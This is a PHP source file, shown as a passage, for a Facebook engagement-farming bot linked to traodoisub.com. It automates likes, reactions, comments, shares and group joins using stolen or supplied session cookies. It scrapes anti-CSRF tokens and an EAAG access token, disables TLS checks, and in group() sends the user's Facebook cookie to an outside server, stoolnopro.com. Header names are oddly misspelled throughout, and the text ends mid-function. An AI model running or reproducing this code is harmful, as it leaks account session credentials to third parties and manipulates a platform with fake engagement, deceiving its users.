 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
 $data = array('acccess_token' => $acccess_token);
 curl_setopt($ch, CURLOPT_POST, count($data));
 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
 $acccess = curl_exec($ch);
 curl_close($ch);
 return json_decode($acccess);
}
function cmt($acccess_token, $id, $cookie, $msg)
{
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, 'https://graph.facebook.com/' . $id . '/comments');
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "authority: m.facebook.com";
 $head[] = "cccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "acccept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
 $head[] = "cache-control: max-age=0";
 $head[] = "upgrade-insecure-requests: 1";
 $head[] = "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
 $head[] = "sec-fetch-site: none";
 $head[] = "sec-fetch-mode: navigate";
 $head[] = "sec-fetch-user: ?1";
 $head[] = "sec-fetch-dest: document";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
 $data = array('message' => $msg, 'acccess_token' => $acccess_token);
 curl_setopt($ch, CURLOPT_POST, count($data));
 curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
 $acccess = curl_exec($ch);
 curl_close($ch);
 return json_decode($acccess);
}
function camxuc($id, $type, $cookie) 
{
 $ch = curl_init();
 if (strpos($id, '_')) {
  $uid = explode('_', $id, 2);
  $id2 = 'story.php?story_fbid=' . $uid[1] . '&id=' . $uid[0];
 } else {
  $id2 = $id;
 }
 curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com/' . $id2);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
	:'));
 $page = curl_exec($ch);
 if ($id2 != $id && explode('&amp;origin_uri=', explode('amp;ft_id=', $page, 2)[1], 2)[0]) {
  $get = explode('&amp;origin_uri=', explode('amp;ft_id=', $page, 2)[1], 2)[0];
 } else {
  $get = $id2;
 }
 $link = 'https://mbasic.facebook.com/reactions/picker/?is_permalink=1&ft_id=' . $get;
 curl_setopt($ch, CURLOPT_URL, $link);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 $cx = curl_exec($ch);
 $haha = explode('<a href="', $cx);
 if ($type == 'LIKE') {
  $haha2 = explode('" style="display:block"', $haha[1])[0];
 } elseif ($type == 'LOVE') {
  $haha2 = explode('" style="display:block"', $haha[2])[0];
 } elseif ($type == 'CARE') {
  $haha2 = explode('" style="display:block"', $haha[3])[0];
 } else if ($type == 'HAHA') {
  $haha2 = explode('" style="display:block"', $haha[4])[0];
 } else if ($type == 'WOW') {
  $haha2 = explode('" style="display:block"', $haha[5])[0];
 } else if ($type == 'SAD') {
  $haha2 = explode('" style="display:block"', $haha[6])[0];
 } elseif ($type == 'ANGRY') {
  $haha2 = explode('" style="display:block"', $haha[7])[0];
 }
 $link2 = html_entity_decode($haha2);
 curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com' . $link2);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_exec($ch);
 curl_close($ch);
}

function page($id, $cookie)
{
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com/' . $id);
 $head[] = "Connection: keep-alive";
 $head[] = "Keep-Alive: 300";
 $head[] = "Acccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
 $head[] = "Acccept-Language: en-us,en;q=0.5";
 curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
 curl_setopt($ch, CURLOPT_ENCODING, '');
 curl_setopt($ch, CURLOPT_COOKIE, $cookie);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
 curl_setopt($ch, CURLOPT_TIMEOUT, 60);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
 curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
	:'));
 $page = curl_exec($ch);
 if (explode('&amp;refid=', explode('pageSuggestionsOnLiking=1&amp;gfid=', $page)[1])[0]) {
  $get = explode('&amp;refid=', explode('pageSuggestionsOnLiking=1&amp;gfid=', $page)[1])[0];
  $link = 'https://mbasic.facebook.com/a/profile.php?fan&id=' . $id . '&origin=page_profile&pageSuggestionsOnLiking=1&gfid=' . $get . '&refid=17';
  curl_setopt($ch, CURLOPT_URL, $link);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_exec($ch);
 }
 curl_close($ch);
}

function datnick($idfb)
{
 $data = "iddat=" . $idfb;
 
 $head = array(
  "Host: traodoisub.com",
  "content-length: " . strlen($data),
  "acccept: */*",
  "x-requested-with: XMLHttpRequest",
  "sec-ch-ua-mobile: ?1",
  "save-data: on",
  "user-agent: Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Mobile Safari/537.36",
  "content-type: application/x-www-form-urlencoded; charset=UTF-8",
  "origin: https://traodoisub.com",
  "sec-fetch-site: same-origin",
  "sec-fetch-mode: cors",
  "sec-fetch-dest: empty",
  "referer: https://traodoisub.com/view/cauhinh/"
 );
 
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => 'https://traodoisub.com/scr/datnick.php',
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_POSTFIELDS => $data,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIEFILE => "TDS.txt",
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_ENCODING => TRUE
 ));
 
 $a = curl_exec($ch);
 curl_close($ch);
 return $a;
}



function getnv($loai)
{
 $head = array(
  "Host: traodoisub.com",
  "save-data: on",
  "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
  "acccept: */*",
  "sec-fetch-site: same-origin",
  "sec-fetch-mode: cors",
  "sec-fetch-dest: empty",
  "referer: https://traodoisub.com/ex/" . $loai . "/"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => 'https://traodoisub.com/ex/' . $loai . '/load.php',
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_HTTPGET => true,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIEFILE => "TDS.txt",
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_ENCODING => TRUE
 ));
 $a = curl_exec($ch);
 curl_close($ch);
 return $a;
}
function nhantien($tp, $loai, $id)
{
 $url  = "https://traodoisub.com/ex/" . $loai . "/nhantien.php";
 $data = "id=" . $id . "&type=" . $tp;
 $head = array(
  "Host: traodoisub.com",
  "content-length: " . strlen($data),
  "acccept: */*",
  "origin: https://traodoisub.com",
  "x-requested-with: XMLHttpRequest",
  "user-agent: Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36",
  "content-type: application/x-www-form-urlencoded; charset=UTF-8",
  "referer: https://traodoisub.com/ex/" . $loai . "/"
 );
$file_luu_ck_fb = "CookieFbToolKhoi.txt";
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => $url,
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_POSTFIELDS => $data,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIEFILE => "TDS.txt",
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_ENCODING => TRUE
 ));
 $a = curl_exec($ch);
 curl_close($ch);
 return $a;
}
function share($id, $cookie)
{
 $url  = "https://mbasic.facebook.com/" . $id . "";
 $head = array(
  "Host: mbasic.facebook.com",
  "upgrade-insecure-requests: 1",
  "save-data: on",
  "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
  "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*" . "/" . "*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "sec-fetch-site: same-origin",
  "sec-fetch-mode: navigate",
  "sec-fetch-user: ?1",
  "sec-fetch-dest: document",
  "acccept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => $url,
  CURLOPT_FOLLOWLOCATION => false,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_HTTPGET => true,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_HEADER => true,
  CURLOPT_COOKIE => $cookie,
  CURLOPT_ENCODING => TRUE
 ));
 $data = curl_exec($ch);
 if (strpos($data, "xs=deleted") == true) {
  print "\033[1;31mCookie Die !!!!\n";
  exit();
 }

 $one = explode("location: ", $data);
 $two = explode("rdr", $one[1]);
 $url = $two[0] . "rdr";
 if ($url == 'rdr') {
 } else {
  curl_setopt_array($ch, array(
   CURLOPT_URL => $url,
   CURLOPT_FOLLOWLOCATION => false,
   CURLOPT_RETURNTRANSFER => 1,
   CURLOPT_POST => 1,
   CURLOPT_HTTPGET => true,
   CURLOPT_SSL_VERIFYPEER => 0,
   CURLOPT_HTTPHEADER => $head,
   CURLOPT_HEADER => true,
   CURLOPT_ENCODING => TRUE
  ));
  $a = curl_exec($ch);
  curl_close($ch);
  $data   = explode('"', explode('<a href="/composer/mbasic/?c_src=share&amp;', $a)[1])[0];
  $l1 = explode('amp;', $data)[0];
  $l2 = explode('amp;', $data)[1];
  $l3 = explode('amp;', $data)[2];
  $l4 = explode('amp;', $data)[3];
  $l5 = explode('amp;', $data)[4];
  $l6 = explode('amp;', $data)[5];
  $l7 = explode('amp;', $data)[6];
  $l8 = explode('amp;', $data)[7];
  $l9 = explode('amp;', $data)[8];
  $l10 = explode('amp;', $data)[9];
  $l11 = explode('amp;', $data)[10];
  $link = "https://mbasic.facebook.com/composer/mbasic/?c_src=share&" . $l1 . "" . $l2 . "" . $l3 . "" . $l4 . "" . $l5 . "" . $l6 . "" . $l7 . "" . $l8 . "" . $l9 . "" . $l10 . "" . $l11 . "";
 }
 #begin
 $head = array(
  "Host: mbasic.facebook.com",
  "cache-control: max-age=0",
  "save-data: on",
  "upgrade-insecure-requests: 1",
  "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
  "referer: https://mbasic.facebook.com/home.php",
  "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "sec-fetch-site: none",
  "sec-fetch-mode: navigate",
  "sec-fetch-user: ?1",
  "sec-fetch-dest: document"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => $link,
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_HTTPGET => true,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIE => $cookie,
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_ENCODING => TRUE
 ));
 $data = curl_exec($ch);
 curl_close($ch);
 $a   = explode('" id="composer_form"', explode('<form method="post" action="', $data)[1])[0];
 $a1 = explode('amp;', $a)[0];
 $a2 = explode('amp;', $a)[1];
 $a3 = explode('amp;', $a)[2];
 $a4 = explode('amp;', $a)[3];
 $link2 = "https://mbasic.facebook.com" . $a1 . "" . $a2 . "" . $a3 . "" . $a4 . "&ref=dbl";
 $fb_dtsg   = explode('" autocomplete="off"', explode('name="fb_dtsg" value="', $data)[1])[0];
 $jazoest   = explode('" autocomplete="off"', explode('name="jazoest" value="', $data)[1])[0];
 $target   = explode('"', explode('name="target" value="', $data)[1])[0];
 $csid   = explode('"', explode('name="csid" value="', $data)[1])[0];
 $privacyx   = explode('"', explode('name="privacyx" value="', $data)[1])[0];
 $cver   = explode('"', explode('name="cver" value="', $data)[1])[0];
 $m   = explode('"', explode('name="m" value="', $data)[1])[0];
 $shared_from_post_id   = explode('"', explode('name="shared_from_post_id" value="', $data)[1])[0];
 $cscr   = explode('"', explode('name="c_src" value="', $data)[1])[0];
 $referrer   = explode('"', explode('name="referrer" value="', $data)[1])[0];
 $ctype   = explode('"', explode('name="ctype" value="', $data)[1])[0];
 $sid   = explode('"', explode('name="sid" value="', $data)[1])[0];
 $waterfall_source   = explode('"', explode('name="waterfall_source" value="', $data)[1])[0];

 date_default_timezone_set('Asia/Ho_Chi_Minh');
 $t = date('d-m-Y | H:i:s');
 $data = "comment=Hợp Tool&m=oneclick&privacyx=" . $privacyx . "&sid=" . $sid . "&shareID=" . $sid . "&fs=1&fr=null&internal_preview_image_id=null&should_share_post=false&direct=true&_ft_=" . $l11 . "&fb_dtsg=" . $fb_dtsg . "&jazoest=" . $jazoest . "__dyn=1KQEGiFo525Ujwh8-F42mml3onxG6UO3m2i5UfXwNwTwKwSwMxWUW16wZxm6Uhx6485-0SUhxm3O0AE8o11E52q3q5U2nweS787S78K1Jwt8-0lm68WUS2F0EU6i12wm8qwk888C0NEeo5Wq3q0H8-7E2swp82vwAwmE2ewnE2Lw5dw&__csr=&__req=7&__a=AYmQRaSRpckx8Ugg8YkSOfYUUczZWHGSt_e3GRCVZ-yzwoxI0JMFbt_4bf2bG-XPk4FOLrTs5QEGOofdlpo6f5hUReNVHgYej0SSg1hYsLZoMQ&__user=" . $target . "";
 $header = array(
  "Host: m.facebook.com",
  "content-length: " . strlen($data),
  "origin: https://m.facebook.com",
  "x-requested-with: XMLHttpRequest",
  "user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36",
  "x-response-format: JSONStream",
  "content-type: application/x-www-form-urlencoded",
  "acccept: */*",
  "referer: https://m.facebook.com/"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => 'https://m.facebook.com/a/sharer.php',
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_POSTFIELDS => $data,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIE => $cookie,
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_ENCODING => TRUE
 ));
 $data = curl_exec($ch);
 curl_close($ch);
}

function group($id, $cookie)
{
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, 'https://stoolnopro.com/admin/api/group.php?id=' . $id . '&cookie=' . $cookie);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
 $headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36';
 $headers[] = 'Acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
 $headers[] = 'Acccept-Language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5';
 curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
 curl_setopt($ch, CURLOPT_TIMEOUT, 5);
 $send = json_decode(curl_exec($ch), true);
 curl_close($ch);
 return $send;
}

function joingroup($id, $cookie)
{
 $url  = "https://mbasic.facebook.com/groups/" . $id . "";
 $head = array(
  "Host: mbasic.facebook.com",
  "upgrade-insecure-requests: 1",
  "save-data: on",
  "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
  "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*" . "/" . "*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "sec-fetch-site: same-origin",
  "sec-fetch-mode: navigate",
  "sec-fetch-user: ?1",
  "sec-fetch-dest: document",
  "acccept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => $url,
  CURLOPT_FOLLOWLOCATION => false,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_HTTPGET => true,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_HEADER => true,
  CURLOPT_COOKIE => $cookie,
  CURLOPT_ENCODING => TRUE
 ));
 $a = curl_exec($ch);
 if (strpos($a, "xs=deleted") == true) {
  print "\033[1;31m Cookie Die\n";
  exit();
 }
 $data   = explode('"', explode('/a/group/join/', $a)[1])[0];
 $l1 = explode('amp;', $data)[0];
 $l2 = explode('amp;', $data)[1];
 $l3 = explode('amp;', $data)[2];
 $fb_dtsg   = explode('" autocomplete="off"', explode('name="fb_dtsg" value="', $a)[1])[0];
 $jazoest   = explode('" autocomplete="off"', explode('name="jazoest" value="', $a)[1])[0];

 $link = "https://mbasic.facebook.com/a/group/join/" . $l1 . "" . $l2 . "" . $l3 . "";
 if ($link == 'https://mbasic.facebook.com/a/group/join/') {
 } else {
  $data = "fb_dtsg=" . $fb_dtsg . "&jazoest=" . $jazoest . "";
  $header = array(
   "Host: mbasic.facebook.com",
   "content-length: " . strlen($data),
   "cache-control: max-age=0",
   "origin: https://mbasic.facebook.com",
   "upgrade-insecure-requests: 1",
   "content-type: application/x-www-form-urlencoded",
   "user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36",
   "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
   "referer: " . $url . ""
  );
  $ch   = curl_init();
  curl_setopt_array($ch, array(
   CURLOPT_URL => $link,
   CURLOPT_RETURNTRANSFER => 1,
   CURLOPT_POST => 1,
   CURLOPT_POSTFIELDS => $data,
   CURLOPT_SSL_VERIFYPEER => 0,
   CURLOPT_COOKIE => $cookie,
   CURLOPT_HTTPHEADER => $header,
   CURLOPT_ENCODING => TRUE,
   CURLOPT_FOLLOWLOCATION => true
  ));
  $ccc = curl_exec($ch);
  $location = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
  curl_close($ch);
 }
 return $location;
}

function reaction_cmt($id, $idfb, $type, $cookie)
{
 $url  = "https://mbasic.facebook.com/" . $id . "";
 $head = array(
  "Host: mbasic.facebook.com",
  "upgrade-insecure-requests: 1",
  "save-data: on",
  "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
  "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*" . "/" . "*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "sec-fetch-site: same-origin",
  "sec-fetch-mode: navigate",
  "sec-fetch-user: ?1",
  "sec-fetch-dest: document",
  "acccept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => $url,
  CURLOPT_FOLLOWLOCATION => false,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_HTTPGET => true,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_HEADER => true,
  CURLOPT_COOKIE => $cookie,
  CURLOPT_ENCODING => TRUE
 ));
 $data = curl_exec($ch);
 $one = explode("location: ", $data);
 $two = explode("rdr", $one[1]);
 $url = $two[0] . "rdr";
 if ($url == 'rdr') {
 } else {
  $idpost = explode('&id=', $url)[0];
  $idvictim = explode('&id=', $url)[1];
  curl_close($ch);
  if (strpos($data, "xs=deleted") == true) {
  }
  $head = array(
   "Host: mbasic.facebook.com",
   "cache-control: max-age=0",
   "sec-ch-ua-mobile: ?1",
   "save-data: on",
   "upgrade-insecure-requests: 1",
   "user-agent: Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Mobile Safari/537.36",
   "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
   "sec-fetch-site: none",
   "sec-fetch-mode: navigate",
   "sec-fetch-user: ?1",
   "sec-fetch-dest: document"
  );
  $ch   = curl_init();
  curl_setopt_array($ch, array(
   CURLOPT_URL => 'https://mbasic.facebook.com/reactions/picker/?ft_id=' . $id . '&origin_uri=https://mbasic.facebook.com/' . $idvictim . '/posts/' . $idpost . '/?app=fbl&fbt_id=' . $id . '&lul&av=' . $idfb . '&__tn__=R',
   CURLOPT_FOLLOWLOCATION => false,
   CURLOPT_RETURNTRANSFER => 1,
   CURLOPT_POST => 1,
   CURLOPT_HTTPGET => true,
   CURLOPT_SSL_VERIFYPEER => 0,
   CURLOPT_HTTPHEADER => $head,
   CURLOPT_HEADER => true,
   CURLOPT_COOKIE => $cookie,
   CURLOPT_ENCODING => TRUE
  ));
  $cx = curl_exec($ch);
  $haha = explode('<a href="', $cx);
  if ($type == 'LOVE') {
   $haha2 = explode('" style="display:block"', $haha[2])[0];
  } else if ($type == 'CARE') {
   $haha2 = explode('" style="display:block"', $haha[3])[0];
  } else if ($type == 'HAHA') {
   $haha2 = explode('" style="display:block"', $haha[4])[0];
  } else if ($type == 'WOW') {
   $haha2 = explode('" style="display:block"', $haha[5])[0];
  } else if ($type == 'SAD') {
   $haha2 = explode('" style="display:block"', $haha[6])[0];
  } else {
   $haha2 = explode('" style="display:block"', $haha[7])[0];
  }
  if ($type == 'LIKE') {
   $data   = explode('"', explode('<a href="/ufi/reaction/?ft_ent_identifier=', $cx)[1])[0];
   curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com/ufi/reaction/?ft_ent_identifier=' . htmlspecialchars_decode($data));
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_exec($ch);
   curl_close($ch);
  } else {
   $link2 = html_entity_decode($haha2);
   curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com' . $link2);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $x = curl_exec($ch);
   $location = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
   curl_close($ch);
  }
 }
 return $location;
}
function loadtime($loai)
{
 $so = 0;
 $delay = $_SESSION['' . $loai . ''];
 for($tt = $delay ;$tt>= 1;$tt--){
  echo "\r\033[1;33m   AN ORIN \033[1;31m ~> \033[1;32m LO   \033[1;31m >   | $tt | ";
  usleep(150000);
  echo "\r\033[1;31m AN ORIN \033[0;33m   ~>  \033[0;37m LOA  \033[0;31m >>  | $tt | ";
  usleep(150000);
  echo "\r\033[1;32m AN ORIN \033[0;33m  ~>   \033[0;37m LOAD \033[0;31m >>> | $tt | ";
  usleep(150000);
  echo "\r\033[1;34m AN ORIN \033[0;33m ~> \033[0;37m LOADI   \033[0;31m >   | $tt | ";
  usleep(150000);
  echo "\r\033[1;35m AN ORIN \033[0;33m  ~>\033[0;37m LOADIN  \033[0;31m >>  | $tt | ";
  usleep(150000);
  echo "\r\033[1;35m AN ORIN \033[0;33m  ~>\033[0;37m LOADING \033[0;31m >>> | $tt | ";
  usleep(150000);
  echo "\r\033[1;35m AN ORIN \033[0;33m  ~>\033[0;37m LOADING.\033[0;31m | $tt | ";
  usleep(150000);
 echo "\r\e[1;95m  AN ORIN  TDS COOKIE V1 \r";
}}

function chongbl($loai) {
 for ($x = $_SESSION['' . $loai . '']; $x--; $x) {
  echo "\r\033[1;97m Đang hoạt động chống block sẽ chạy lại sau $x giây"; sleep(1); echo "\r    \r"; 
}}

function gettoken($cookie, $useragent)
{
 $head = array("Connection: keep-alive", "Keep-Alive: 300", "authority: business.facebook.com", "cccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "acccept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5", "cache-control: max-age=0", "upgrade-insecure-requests: 1", "acccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "sec-fetch-site: none", "sec-fetch-mode: navigate", "sec-fetch-user: ?1", "sec-fetch-dest: document");
 $ch = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => "https://business.facebook.com/business_locations",
  CURLOPT_USERAGENT => $useragent,
  CURLOPT_COOKIE => $cookie,
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_SSL_VERIFYPEER => FALSE,
  CURLOPT_TIMEOUT => 60,
  CURLOPT_CONNECTTIMEOUT => 60,
  CURLOPT_FOLLOWLOCATION => TRUE
 ));
 $acccess = curl_exec($ch);
 curl_close($ch);
 $acccess_token = 'EAAG' . explode('","', explode('EAAG', $acccess)[1])[0];
 if (strlen($acccess_token) > 5) {
  return $acccess_token;
 } else {
  return 'die';
 }
}
function getxu()
{
 $url = "https://traodoisub.com/scr/user.php";
 $head = array(
  "Host: traodoisub.com",
  "acccept: application/json, text/javascript, */*; q=0.01",
  "x-requested-with: XMLHttpRequest",
  "save-data: on",
  "user-agent: Mozilla/5.0 (Linux; Android 10; SM-A125F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36",
  "sec-fetch-site: same-origin",
  "sec-fetch-mode: cors",
  "sec-fetch-dest: empty",
  "referer: https://traodoisub.com/home/"
 );
 $ch   = curl_init();
 curl_setopt_array($ch, array(
  CURLOPT_URL => $url,
  CURLOPT_FOLLOWLOCATION => TRUE,
  CURLOPT_RETURNTRANSFER => 1,
  CURLOPT_POST => 1,
  CURLOPT_HTTPGET => true,
  CURLOPT_SSL_VERIFYPEER => 0,
  CURLOPT_COOKIEFILE => "TDS.txt",
  CURLOPT_HTTPHEADER => $head,
  CURLOPT_ENCODING => TRUE
 ));
 $data = curl_exec($ch);
 curl_close($ch);
 $json = json_decode($data, true);
 $sodu = $json["xu"];
 return $sodu;
}

function huyfollow($id, $useragent, $cookie)
{
 $ch = curl_init();
 if (strpos($id, '_')) {
  $uid = explode('_', $id, 2);
  $id2 = 'story.php?story_fbid=' . $uid[1] . '&id=' . $uid[0];
 } else {
  $id2 = $id;
 }

 $header = array(
  "Host:mbasic.facebook.com",
  "user-agent:$useragent",
  "acccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "cookie:$cookie",
 );
 
